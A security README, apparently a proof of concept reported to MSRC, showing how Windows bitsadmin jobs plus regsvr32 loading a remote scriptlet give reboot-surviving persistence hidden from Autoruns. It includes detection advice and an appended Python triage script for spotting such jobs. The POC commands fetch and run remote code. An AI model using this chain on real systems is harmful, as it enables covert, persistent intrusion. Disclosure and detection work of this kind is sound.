└── README.md

/README.md:
--------------------------------------------------------------------------------
# bitsadminexec
Use bitsadmin to maintain persistence and bypass Autoruns

Report to MSRC.

Author: 3gstudent@3gstudent

License: BSD 3-Clause

### POC

(1) First, we need administrator rights.

(2) Then run this in cmd with administrator rights:

```
bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
bitsadmin /Resume backdoor
```

(3) It will then run the following command to start calc.exe:
```
regsvr32.exe /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
```

(4) What's more, after the system restarts, the command that starts calc.exe runs again and again.


### Impact of the issue

Autoruns' startup monitor can't find this.

Tested successfully on Win7, Win8, Server 2008 and so on.

### Detect

Run this to check the jobs, then delete the job:
```
bitsadmin /list /allusers /verbose
```
or stop the Background Intelligent Transfer Service.

### More details:

http://drops.wooyun.org/tips/15692

《Use bitsadmin to maintain persistence and bypass Autoruns》
--------------------------------------------------------------------------------
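One way to triage the output of the `bitsadmin /list /allusers /verbose` command from the Detect section, as an added example that is not part of the original README: it flags jobs that carry a notification command line or transfer from a non-HTTP source, the two traits of the job created in the POC. The output layout, the sample text (including the placeholder URLs) and the function names are assumptions constructed for illustration.

```python
import re

# Constructed, abridged `bitsadmin /list /allusers /verbose` output; layout is an assumption.
SAMPLE = r"""
GUID: {11111111-1111-1111-1111-111111111111} DISPLAY: 'backdoor'
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: WIN7\admin
JOB FILES:
    302592 / 302592 WORKING C:\Windows\system32\cmd.exe -> C:\Users\admin\AppData\Local\Temp\cmd.exe
NOTIFICATION COMMAND LINE: 'regsvr32.exe' '/u /s /i:https://example.invalid/placeholder.sct scrobj.dll'
GUID: {22222222-2222-2222-2222-222222222222} DISPLAY: 'Updater'
TYPE: DOWNLOAD STATE: SUSPENDED OWNER: NT AUTHORITY\SYSTEM
JOB FILES:
    0 / UNKNOWN WORKING https://example.invalid/update.cab -> C:\ProgramData\update.cab
NOTIFICATION COMMAND LINE: none
"""

JOB = re.compile(r"^GUID: (\{[0-9A-Fa-f-]+\}) DISPLAY: '(.*)'$")
OWNER = re.compile(r"OWNER: (.+)$")
FILE = re.compile(r"^\S+ / \S+ \S+ (.+?) -> (.+)$")   # "<done> / <total> <state> <src> -> <dst>"
NOTIFY = re.compile(r"^NOTIFICATION COMMAND LINE: (.*)$")

def parse_jobs(text):
    """Split verbose bitsadmin output into one dict per job."""
    jobs = []
    for line in (l.strip() for l in text.splitlines()):
        if m := JOB.match(line):
            jobs.append({"guid": m[1], "name": m[2], "owner": None, "files": [], "notify": None})
        elif not jobs:
            continue  # preamble before the first job header
        elif m := OWNER.search(line):
            jobs[-1]["owner"] = m[1]
        elif m := FILE.match(line):
            jobs[-1]["files"].append((m[1], m[2]))
        elif (m := NOTIFY.match(line)) and m[1].lower() != "none":
            jobs[-1]["notify"] = re.findall(r"'([^']*)'", m[1]) or [m[1]]
    return jobs

def findings(job):
    reasons = []  # an empty list means nothing was flagged for this job
    if job["notify"]:
        reasons.append("notify command: " + " ".join(job["notify"]))
        if re.search(r"https?://", " ".join(job["notify"]), re.I):
            reasons.append("notify command references a remote URL")
    if any(not re.match(r"(?i)https?://", src) for src, _ in job["files"]):
        reasons.append("transfer source is not an http(s) URL")
    return reasons

def triage(text):
    return {j["name"]: findings(j) for j in parse_jobs(text) if findings(j)}
```

Legitimate software also sets notification commands and BITS can transfer over SMB, so treat a flagged job as a lead to review by owner and command line rather than a verdict.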